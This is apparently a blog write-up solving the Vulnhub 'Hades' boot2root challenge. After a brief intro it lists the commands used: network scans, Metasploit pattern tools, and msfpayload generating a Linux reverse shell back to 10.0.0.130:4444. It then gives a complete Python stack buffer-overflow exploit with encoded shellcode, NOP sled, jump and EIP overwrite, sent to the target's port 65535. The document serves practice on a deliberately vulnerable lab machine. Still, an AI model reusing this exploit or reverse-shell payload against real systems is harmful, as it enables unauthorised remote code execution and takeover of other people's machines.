About a month ago, Vulnhub released a boot2root image built by Lok_Sigma called Hades. The box promised to be full of annoyances and it delivered them in droves. Requiring a combination of exploit development, reverse engineering and some out of the box thinking, I really enjoyed this challenge. I decided to share my solution now that the competition is over. It goes without saying this post has a lot of SPOILERS!
Big thanks go out to the Vulnhub team for the awesome work they do. Follow them on Twitter to keep up with the latest releases.
If you want to tackle Hades yourself, you can grab a copy of the machine here.
Enjoy
Commands Used
# Host Discovery
netdiscover -r 10.0.0.0/24
# Service Enumeration
nmap -v -sS -T4 -n -p- 10.0.0.129 && us -mU -v -p 1-65535 10.0.0.129
# Base64 Decryption
base64 -d ssh-hades > hades.bin
# Pattern Creation
/opt/metasploit-framework/tools/pattern_create 1000
# Offset Search
/opt/metasploit-framework/tools/pattern_offset.rb Af7A
/opt/metasploit-framework/tools/pattern_offset.rb 5Af6
/opt/metasploit-framework/tools/pattern_offset.rb 0x34654133
# Finding Assembly Shellcode
/opt/metasploit-framework/tools/metasm_shell.rb
metasm> jmp $esp+80
# Reverse Shell Payload
msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python
# Improved Shell
python -c "import pty; pty.spawn('/bin/sh')"
# File Decryption
openssl enc -d -aes-256-cbc -in flag.txt.enc -out flag.txt -pass file:key_file
Finished Exploit – Hades
#!/usr/bin/env python
import socket, struct
target = '10.0.0.129'
port = 65535
# Shellcode
# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python
# [*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)
buf = ""
buf += "\xda\xc7\xd9\x74\x24\xf4\x5d\xba\xc4\xe0\xc2\x40\x2b"
buf += "\xc9\xb1\x12\x83\xed\xfc\x31\x55\x13\x03\x91\xf3\x20"
buf += "\xb5\x28\x2f\x53\xd5\x19\x8c\xcf\x70\x9f\x9b\x11\x34"
buf += "\xf9\x56\x51\xa6\x5c\xd9\x6d\x04\xde\x50\xeb\x6f\xb6"
buf += "\x68\x0b\x90\xc4\x05\x09\x90\xd9\x89\x84\x71\x69\x57"
buf += "\xc7\x20\xda\x2b\xe4\x4b\x3d\x86\x6b\x19\xd5\x36\x43"
buf += "\xed\x4d\x21\xb4\x73\xe4\xdf\x43\x90\xa4\x4c\xdd\xb6"
buf += "\xf8\x78\x10\xb8"
# Buffer
#buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
buffer = '\x90'*11
buffer += buf
buffer += '\x90'*(131-95-11)
buffer += '\xeb\x4e\x90\x90' # esp - 0x2c
buffer += 'F'*(167-4-131)
buffer += 'B'*4 # ebp
buffer += struct.pack("<L",0x08048694) # eip
buffer += 'D'*(1000-4-4-167)
# Connect and send payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(buffer)
data = s.recv(1024)
s.close()